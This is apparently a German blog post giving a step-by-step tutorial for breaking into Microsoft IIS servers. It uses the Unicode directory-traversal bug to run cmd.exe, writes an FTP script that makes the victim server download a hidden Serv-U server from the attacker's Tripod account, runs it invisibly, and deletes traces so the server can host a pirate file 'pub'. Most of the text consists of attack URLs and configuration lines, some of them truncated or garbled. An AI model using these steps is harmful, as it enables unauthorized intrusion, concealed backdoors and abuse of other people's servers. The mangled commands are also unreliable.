Hallo, ich werde euch jetzt mal Zeigen wie ihr einen IIS Hacken künt
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1.)
Als erstes installiert ihr jetzt Serv-U und konfiguriert den Port und
die Login-Daten genau so , wie die späteren Login-Daten von dem Server
sein sollen ... Interessant hierbei ist für uns am ende nur die
Serv-u.exe und die Serv-u.ini...
2.)
Wir öffnen die Serv-U.ini , denn wir wollen noch ein bischen was dazu
schreiben, damit uns der Admin nicht so schnell entdeckt...
unter der Sektion [GLOBAL] fügen wir die Zeile
INVISIBLE=TRUE ein...
das bewirkt , das Serv-U nicht sichtbar auf dem Server gestartet wird...
3.)
bei eurem eingerichteten USER sollten die Zeilen ungefähr
so aussehen :
HomeDir=c:
AlwaysAllowLogin=YES
Access1=h:,RWAMCDLEP
Access2=g:,RWAMCDLEP
Access3=f:,RWAMCDLEP
Access4=e:,RWAMCDLEP
Access5=d:,RWAMCDLEP
Access6=c:,RWAMCDLEP
Access7=j:,RWAMCDLEP
inklusive solltet ihr Zwei verschiedene USER eingerichtet haben
einmal euer Zugang , der die kompletten Schreibrechte hat (s.o)
und einen Zugang für remote-USER , die zB keine Schreibrechte haben
sollen, der remote-USER account würde ungefähr so aussehen:
Access1=c:,RLP
Access2=d:,RLP (usw.)
4.)
Danach brauchen wir unseren Tripod-Account ;P ,
dort laden wir ins root-Verzeichniss unsere Serv-U.exe und unsere
konfigurierte Serv-U.ini...
mehr brauchen wir dort erst mal nicht machen .
5.)
Jetzt benutzen wir den IIS-Scanner und suchen uns eine Range aus
erfahrene Scanner gucken im IP-Index nach, oder man nimmt eine
Hostlookup-Engine um Die Ip einer Site rauszufinden ...
nun geben wir in unserem IIS-Scanner eine nette Range ein , die ihr
euch ausgeguckt habt, und wir scannen ein bischen (kann manchmal auch
recht lange dauern).
Wenn uns dann der Scanner Einen Server anzeigt sollten wir uns mal die
IP schnappen...
6.)
Nun starten wir den InternetExplorer und geben folgende zeile ein
http://##IP##/scripts/..%%35c..%%35cwinn...d.exe?/c+dir+c:
##IP## steht hierbei für die IP des gescannten Servers ...
mit dieser Zeile machen wir uns den Unicode Bug zunutze
denn dieser String (/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c)
bewirkt das man ins root-Verzeichniss des InetPub gelangt ..
und mit +dir+c: kriegen wir den gesamten Inhalt des Laufwerkes c:
zu Gesichte ... schön oder ?
und genau das machen wir uns zu nutze , denn wir können alle Dos-Befehle
zu unseren Zwecken nutzen mit diesem Bug ...
7.)
WIR erstellen uns nun ein Verzeichnis wo wir unser kleines Serv-U
platzieren wollen ; dieses Verzeichniss sollte nach Möglichkeit
unauffällig sein damit
der Admin keinen Verdacht schöpft ...
http://ip/scripts/..%5c..%5cwinnt/system...ir+c:winntsyste m32temporary
Manchmal haben wir aber keine Schreibrechte für WINNT-Unterverzeichnisse,
also müssen wir improvisieren :
http://ip/scripts/..%5c..%5cwinnt/system...ir+c:tempetcetc etc
d.h. ihr könnt euch nen verzeichniss nach euren Wünschen erstellen
wenn das Verzeichniss erstellt wurde , kommt eine CGI-Fehlermeldung...
8.)
Nun schauen wir ob das Verzeichniss tatsächlich existiert :
http://ip/scripts/..%5c..%5cwinnt/system...+c:winntsystem3 2 emporary
den Pfad müsstet ihr nach eurem anpassen
wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich ..
9.)
http://ip/scripts/..%5c..%5cwinnt/system...y+c:winntsystem 32cmd.exe+superlol.exe
dies brauchen wir um uns den Dos-Echo Befehl zu nutzen, damit wir auch
eine Datei erstellen können
und in jene auch schreiben können ...
10.)
Darauf erstellen wir in unserem Verzeichniss eine .txt Datei
welche wir als FTP-Script nutzen , damit sich der Server per FTP auf
unserem Tripod-Account einwählt und sich dann Serv-U.exe -.ini downloadet..
http://ip/scripts/superlol.exe?/c+echo+o...VER##+##PORT##& gt;>c:winntsystem32 emporaryftpscr.txt
http://ip/scripts/superlol.exe?/c+echo+##USERNAME##>>c:winntsystem 32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+##PASSWORD##>>c:winntsystem 32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:winntsystem32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:winntsyst em32temporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+get+servu.ini>>c:winntsyste m32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+quit>>c:winntsystem32 emporaryftpscr.txt
Diese Zeilen geben wir nach einander ein im browser , dadurch werden die
commandos für den Server
geschrieben ...
Sollte doch eigentlich klar sein , was das bedeutet ;P
11.)
schauen wir uns die Datei erst nocheinmal an, ob auch alles richtig ist...
wenn jetzt folgendes Erscheint ist alles okay *grins*:
http://ip/scripts/superlol.exe?/c+type+c:winntsystem32 emporaryftpscr.txt
open ##IP-VOM-FTP-SERVER##
##USERNAME##
##PASSWORD##
BINARY
get serv-u.exe
get serv-u.ini
quit
12.)
http://ip/scripts/..%5c..%5cwinnt/system...+-s:c:winntsyst em32 emporaryftpscr.txt
mit dieser Zeile führen wir nun unser kleines Script aus ...
und der Server connected nun zu eurem Tripod-Account und holt sich euer
Serv-U :-P
13.)
jedoch liegen die Dateien nun im InetPub Verzeichniss des Servers , da wir
aber jene in unser
eigenes Verzeichniss verschieben wollen geben wir folgendes ein :
http://ip/scripts/superlol.exe?/c+move+serv-u*.*+"c:winntsystem32 emporary"
14.)
Um unsere Spuren zu verwischen löschen wir vorsichtshalber noch einmal die
Script Datei
http://ip/scripts/superlol.exe?/c+del+ c:winntsystem32 emporaryftpscr.txt+/Q/F
15.)
http://ip/scripts/superlol.exe?/c+dir+c:winntsystem32 emporary
jetzt schauen wir nach ob Serv-u.exe und Serv-u.ini sich in unserem
Verzeichniss befinden
und ob die Script Datei gelöscht wurde ...
wenn alles in Ordnung ist können wir jetzt weitermachen
16.)
Anschließend führen wir Serv-U auf dem Server aus ...
mit folgendem Befehl ist uns jenes auch sofort möglich ...
http://ip/scripts/superlol.exe?/c+c:winn...yserv-u.exe+ser v-u.ini
man sollte ein paar Sekunden warten bevor man mit Versucht sich mit dem
FTP Proggy einzuloggen...
Wenn man Pech hat , dann hat man einen Server mit Firewall erwischt , das
merkt man einfach daran das man
nicht connecten kann ...
wenn alles klappt könnt ihr euch aber mit euren Serv-U Einstellungen nun
Problemlos einloggen ...
17.)
Jetzt sind wir im Root Verzeichniss des Servers... und haben auch volle
Schreibrechte...
Als nächstes suchen wir uns ein Unterverezeichniss oder erstellen eins, welches
wir als das Verzeichniss benutzen
wollen wo wir uploaden wollen...
wenn dies geschehn ist müsst ihr nochmal die Serv-u.ini öffnen und jene
jetzt anpassen :
euer Account mit den Schreibrechten müsste dann so aussehen (Bsp.):
HomeDir=d:MelindaWORKsampleLESSONnewFUCK
AlwaysAllowLogin=YES
Access1=h:,RWAMCDLEP
Access2=g:,RWAMCDLEP
Access3=f:,RWAMCDLEP
Access4=e:,RWAMCDLEP
Access5=d:,RWAMCDLEP
Access6=c:,RWAMCDLEP
Access7=j:,RWAMCDLEP
RelPaths=YES
und der Account zum Leechen so :
HomeDir=d:MelindaWORKsampleLESSONnewFUCK
RelPaths=YES
Access1=d:MelindaWORKsampleLESSONnewFUCK,RLP
18.)
nun gehen wir nochmal in das Verzeichniss wo unser Serv-U liegt und
überschreiben
die INI datei mit unserer neuen ...
19.)
wir reconnecten , und nun müssten wir in unserem Verezeichniss landen
und man sollte es als root-Verzeichniss sehen...
20.)
ENDLICH könnt ihr euren gehackten Pub fillen...
Das gute an Serv-u ist , das nun der Server Fxp-able und Resumeable ist...
gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
euren
Stuff deleten... !!!!!!!!!!!!FuCk DeLeTeR`S!!!!!!!!!!!!!!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Wie ihr sehen könnt basiert der ganze Hack auf eine kleine Schwachstelle in Unice Coode System das einen die für den hack nötigen schreib Rechte erteilt!
Keine Kommentare:
Kommentar veröffentlichen